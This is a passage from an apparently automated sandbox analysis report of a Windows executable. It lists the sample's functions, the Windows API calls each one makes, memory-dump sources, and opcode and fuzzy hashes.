                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                    • Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
                    • Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
                    • Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694
                    Function 00468E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                    • Instruction ID: 3b5d1e22e3b7b83ea6e308f8ce2403907d65c91d4ff9c09852f69d04d9ef645c
                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                    • Instruction Fuzzy Hash: BDE092B0204B005BD7388A24D800BA373E1AB05304F00091EF2AAC3341EB67B841C75D
                    Function 00405C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,0043DD42,?,?,00000000), ref: 00405C5F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                    • Instruction ID: 2996e6a09d4b0f83628727b5f35a7304175fa4664712b8752db8e98aaff89e7d
                    • Opcode Fuzzy Hash: 14cfb4b96d04a2f7cb021406aaf56b6dbb63ecfee093867407aa16a4735cb87b
                    • Instruction Fuzzy Hash: 75D0C77464020CBFE710DB80DC46FAD777CD705710F200194FD0456290D6B27D548795
                    Function 0042525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99
                    Function 0046D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000002,00000000), ref: 0046D1FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID:
                    • API String ID: 1452528299-0
                    • Opcode ID: a922e54199d856f66316b9f49874a2140691105f4103837f0a19e123fae390fb
                    • Instruction ID: fca64642930eea01f473371421ac76cd1d6e5c7f539a83d07f9f97c05c5cdcbf
                    • Opcode Fuzzy Hash: a922e54199d856f66316b9f49874a2140691105f4103837f0a19e123fae390fb
                    • Instruction Fuzzy Hash: 9D717674A043018FC704EF65C491A6AB7E0EF85318F04496EF996973A2DB38ED45CB5B
                    Function 00C2FCF0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: e7a0769bde9bc132662b8be23590f0f78694cbe62c0b386666ebb0e8b3a18e39
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: BBE0E67494010EDFDB00EFB8D5496DE7FB4EF04301F100565FD01D2281D6309D509A62

                    Non-executed Functions

                    Function 0048CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                    • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                    • SendMessageW.USER32 ref: 0048CC29
                    • _wcsncpy.LIBCMT ref: 0048CC95
                    • GetKeyState.USER32(00000011), ref: 0048CCB6
                    • GetKeyState.USER32(00000009), ref: 0048CCC3
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                    • GetKeyState.USER32(00000010), ref: 0048CCE3
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                    • SendMessageW.USER32 ref: 0048CD33
                    • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                    • SetCapture.USER32(?), ref: 0048CE69
                    • ClientToScreen.USER32(?,?), ref: 0048CECE
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                    • ReleaseCapture.USER32 ref: 0048CF00
                    • GetCursorPos.USER32(?), ref: 0048CF3A
                    • ScreenToClient.USER32(?,?), ref: 0048CF47
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                    • SendMessageW.USER32 ref: 0048CFD1
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                    • SendMessageW.USER32 ref: 0048D03D
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                    • GetCursorPos.USER32(?), ref: 0048D08D
                    • ScreenToClient.USER32(?,?), ref: 0048D09A
                    • GetParent.USER32(?), ref: 0048D0BA
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                    • SendMessageW.USER32 ref: 0048D154
                    • ClientToScreen.USER32(?,?), ref: 0048D1B2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                    • SendMessageW.USER32 ref: 0048D22F
                    • ClientToScreen.USER32(?,?), ref: 0048D281
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                      • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F$pbL
                    • API String ID: 3977979337-2097280626
                    • Opcode ID: 230c309e01b64dd526e4eceab0149aa8d8b99525a36798e8d5036c65b1638749
                    • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                    • Opcode Fuzzy Hash: 230c309e01b64dd526e4eceab0149aa8d8b99525a36798e8d5036c65b1638749
                    • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                    Function 00416F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                    • API String ID: 1357608183-1426331590
                    • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                    • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                    • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                    • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                    Function 004048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                    • IsIconic.USER32(?), ref: 0043D66E
                    • ShowWindow.USER32(?,00000009), ref: 0043D67B
                    • SetForegroundWindow.USER32(?), ref: 0043D685
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                    • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                    • SetForegroundWindow.USER32(?), ref: 0043D6D2
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                    • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                    • keybd_event.USER32(00000012,00000000), ref: 0043D701
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                    • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                    • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                    • SetForegroundWindow.USER32(?), ref: 0043D721
                    • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                    • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                    • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                    • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                    Function 00458310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                      • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                      • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                    • _memset.LIBCMT ref: 00458353
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                    • CloseHandle.KERNEL32(?), ref: 004583B6
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                    • GetProcessWindowStation.USER32 ref: 004583E6
                    • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                      • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                      • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: 6388ce5f88c963af8a849a756f99d6c3c13203fa5580aefd9d0f359e2798b7ca
                    • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                    • Opcode Fuzzy Hash: 6388ce5f88c963af8a849a756f99d6c3c13203fa5580aefd9d0f359e2798b7ca
                    • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                    Function 0046C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                    • FindClose.KERNEL32(00000000), ref: 0046C7E1
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                    • __swprintf.LIBCMT ref: 0046C890
                    • __swprintf.LIBCMT ref: 0046C8D3
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                    • __swprintf.LIBCMT ref: 0046C927
                      • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                    • __swprintf.LIBCMT ref: 0046C975
                      • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                      • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                    • __swprintf.LIBCMT ref: 0046C9C4
                    • __swprintf.LIBCMT ref: 0046CA13
                    • __swprintf.LIBCMT ref: 0046CA62
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: 511509d096d8a85c851f2d3f16a46ec9b1aa2dd11cc0fa5b5634bac435d16de7
                    • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                    • Opcode Fuzzy Hash: 511509d096d8a85c851f2d3f16a46ec9b1aa2dd11cc0fa5b5634bac435d16de7
                    • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                    Function 0046EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0046EFB6
                    • _wcscmp.LIBCMT ref: 0046EFCB
                    • _wcscmp.LIBCMT ref: 0046EFE2
                    • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                    • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                    • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                    • FindClose.KERNEL32(00000000), ref: 0046F031
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                    • _wcscmp.LIBCMT ref: 0046F074
                    • _wcscmp.LIBCMT ref: 0046F08B
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                    • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                    • FindClose.KERNEL32(00000000), ref: 0046F0D2
                    • FindClose.KERNEL32(00000000), ref: 0046F0E4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                    • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                    • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                    • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                    Function 00480857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                    • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                    • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: 3505478b3485744cc1070ec7f7eb5efd5be3945e855373bd555d4648a7c47e02
                    • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                    • Opcode Fuzzy Hash: 3505478b3485744cc1070ec7f7eb5efd5be3945e855373bd555d4648a7c47e02
                    • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                    Function 004166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
